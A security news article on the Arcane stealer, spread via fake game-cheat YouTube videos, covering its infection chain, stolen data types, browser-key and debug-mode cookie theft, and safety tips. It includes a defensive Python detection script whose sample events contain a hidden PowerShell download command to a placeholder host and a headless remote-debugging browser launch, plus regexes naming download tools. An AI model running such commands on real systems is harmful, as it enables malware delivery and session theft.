Cybercriminals have found a clever new way to distribute malware by uploading fake game cheat videos to YouTube, aimed at Russian-speaking users. These videos lead unsuspecting players to download password-protected files that hide a stealthy malware known as Arcane, a powerful stealer designed to collect a wide range of sensitive data.
This new threat highlights how attackers continue to evolve, using popular platforms and interests like gaming to slip past defenses and infect devices silently.
A Dangerous Setup Behind Game Cheat Promises
Malware Hidden in Cheat Downloads
The infection starts with a simple YouTube video promising free cheats or hacks for popular games. In the description, the video includes a download link to a ZIP file protected by a password, making it appear safe or exclusive.
Once downloaded and opened, the archive contains a batch file named start.bat. This file uses PowerShell scripts to pull down more files from remote servers. These files include two hidden programs — one for mining cryptocurrency and another for stealing user data.
The Arcane stealer is the star of this malicious toolkit, replacing an older malware known as VGS, which was previously identified as a Phemedrone variant. Researchers at Kaspersky first discovered Arcane during late 2024.
What Makes Arcane Stand Out
Built with Borrowed Code but Loaded with New Features
Arcane may use elements from other malware families, but it brings new tricks to the table. Its developers added code for collecting vast amounts of data, including personal, financial, system, and account information.
This includes:
- Web browser data: usernames, passwords, cookies, saved cards
- VPN client details: including OpenVPN, NordVPN, Surfshark, ExpressVPN, and others
- Gaming accounts: like Steam, Epic Games, Roblox, Riot, Battle.net, and Minecraft clients
- Messaging platforms: including Discord, Skype, ICQ, Telegram, Signal, Viber, and more
- Crypto wallets: like Zcash, Jaxx, Exodus, Ethereum, Guarda, and Coinomi
- Email clients and FTP tools: such as Outlook, FileZilla, and Cyberduck
What makes Arcane even more dangerous is how it gathers all this information without alerting the user. From screen captures to Wi-Fi passwords and running processes, the stealer silently compiles everything it can find.
Digging Deeper into the Stealer’s Tools
Using Browser Weaknesses to Steal Data
Modern browsers encrypt saved logins and cookies with a per-installation key, and that key is itself protected by Windows’ Data Protection API (DPAPI). Arcane calls DPAPI to unprotect the key, which then lets it decrypt the stored data.
To take it a step further, Arcane drops a small helper called Xaitax, which recovers the browser’s encryption key while running in the background. Arcane quietly reads the result from the tool’s console output and uses it to decrypt saved credentials.
It also launches the browser itself with a debugging mode enabled and pulls cookies through that interface, exposing cookies that are otherwise inaccessible and giving the attacker the live session data for email, shopping, or social media accounts.
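As an added example (not code from the original article or from Kaspersky’s research), here is a defender-side detection pass over constructed process-creation events that flags both steps of the chain described above: the start.bat to PowerShell to remote-download sequence from the infection section, and a browser launched with its debugging interface enabled by a script host rather than by the user. The article does not name the debug mode; the example assumes the Chromium remote-debugging switches, and the field names and sample events are constructed, not real telemetry.

```python
import re

# Constructed process-creation events in simplified Sysmon-style fields; not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1201, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1305, "ppid": 1201, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\player\Downloads\cheat\start.bat"'},
    {"pid": 1410, "ppid": 1305, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://stage.invalid/x.exe -OutFile x.exe"'},
    {"pid": 1520, "ppid": 1410, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --headless --remote-debugging-port=9222"},
    {"pid": 1601, "ppid": 1201, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},  # a normal user launch: must not be flagged
]

DOWNLOAD_CMD = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|curl|wget)\b", re.I)
URL = re.compile(r"https?://", re.I)
REMOTE_DEBUG = re.compile(r"--remote-debugging-(port|pipe)", re.I)  # Chromium remote-debugging switches
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

def _exe(event):
    # Lower-case file name of the image path, whichever separator the log used.
    return re.split(r"[\\/]", event["image"].lower())[-1]

def find_batch_to_powershell_download(events):
    """PIDs of PowerShell processes launched by cmd.exe running a .bat that fetch a URL."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if _exe(e) not in ("powershell.exe", "pwsh.exe") or parent is None:
            continue
        parent_is_batch = _exe(parent) == "cmd.exe" and ".bat" in parent["cmdline"].lower()
        if parent_is_batch and DOWNLOAD_CMD.search(e["cmdline"]) and URL.search(e["cmdline"]):
            hits.append(e["pid"])
    return hits

def find_debug_browser_launch(events):
    """PIDs of browsers started with remote debugging enabled by a script host, not by the user."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if (_exe(e) in BROWSERS and REMOTE_DEBUG.search(e["cmdline"])
                and parent is not None and _exe(parent) in SCRIPT_HOSTS):
            hits.append(e["pid"])
    return hits
```

Running both functions over SAMPLE_EVENTS flags PID 1410 (the PowerShell download spawned from start.bat) and PID 1520 (the script-launched debugging browser) while leaving the ordinary browser launch alone; the parent-process filter is the tunable part, since developers legitimately start browsers with remote debugging from a terminal.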
A Full Profile of the Victim’s Device
Stealthy Monitoring and Device Mapping
Arcane collects more than just account credentials. It creates a full profile of the victim’s system, including:
- Operating system details
- Running applications and background processes
- Screenshots of open windows
- Wi-Fi network names and saved passwords
- Installed software configurations and settings
By gathering this level of detail, the malware can help attackers understand the victim’s behavior, location, and habits — and even decide how to exploit the information further.
The Rise of ArcanaLoader: A Tool for Wider Reach
A Loader That Pretends to Offer Cheats
The malware developers have now expanded their campaign by releasing ArcanaLoader, a small app that claims to download more game cheat tools. In reality, it silently delivers the Arcane malware instead.
This loader is being shared in gaming forums and social media platforms, tricking users who are looking for a competitive edge or free in-game rewards.
Reports suggest that the main targets are users in Russia, Belarus, and Kazakhstan, although others may be affected if they engage with similar cheat-related content.
Why This Method Is So Effective
Familiar Content Makes Users Drop Their Guard
Using YouTube as a launchpad is a smart move for cybercriminals. It is a platform that gamers trust and visit daily. A well-edited video showing cheat demos can seem very convincing, especially when paired with comments praising its success.
Once users are curious enough to download the cheat, the infection process begins. A password-protected archive adds a layer of legitimacy, making the download feel exclusive and safer than it actually is; because its contents are encrypted, the password also stops antivirus and download scanners from inspecting what is inside until the user extracts it.
“This campaign is a clear example of how creative and flexible cybercriminals can be,” said researchers at Kaspersky. “Arcane is dangerous not just because of what it collects, but also because of how well it hides and spreads.”
The Bigger Risk for Gamers and Online Users
Game Cheats Becoming a New Malware Channel
This campaign is not the first time malware has been disguised as game cheats, but the level of detail and scope of Arcane make it a significant leap forward. It shows that attackers are now targeting specific user groups, such as gamers, with advanced tools.
Cybercriminals know that gamers often turn off antivirus software or lower system defenses to run mods or unofficial programs. This makes them perfect targets for stealer malware, especially when the content is presented as useful or desirable.
How to Stay Safe Online
Smart Habits That Help Avoid Infection
- Never download game cheats from YouTube or unknown forums
- Avoid opening ZIP or RAR files from unverified sources
- Keep antivirus software active, even while gaming
- Use trusted VPNs and update them regularly
- Enable two-factor authentication on important accounts
- Regularly monitor your accounts for unusual activity
Users, especially younger ones, must understand that free cheats and mods can come at a cost. In many cases, that cost includes losing personal data, access to email or gaming accounts, or even having funds stolen from digital wallets.
FAQs
What is Arcane stealer malware?
Arcane is a type of malware that collects a wide variety of personal and system data, often disguised as a game cheat tool.
Where is Arcane malware being spread?
It is primarily shared through YouTube videos that promise free game cheats. Users in Russia, Belarus, and Kazakhstan are the main targets.
What kind of information does Arcane collect?
It collects browser data, VPN details, gaming account information, cryptocurrency wallets, Wi-Fi passwords, system data, and more.
What is ArcanaLoader?
ArcanaLoader is a separate program pretending to install cheats, but instead it installs the Arcane malware onto the victim’s system.
Why are gamers being targeted?
Gamers are likely to lower security settings and download unverified tools, making them easier targets for stealer malware.
How can I protect myself from malware like Arcane?
Avoid downloading cheats from unknown sources, keep your system updated, use antivirus software, and never trust content that seems too good to be true.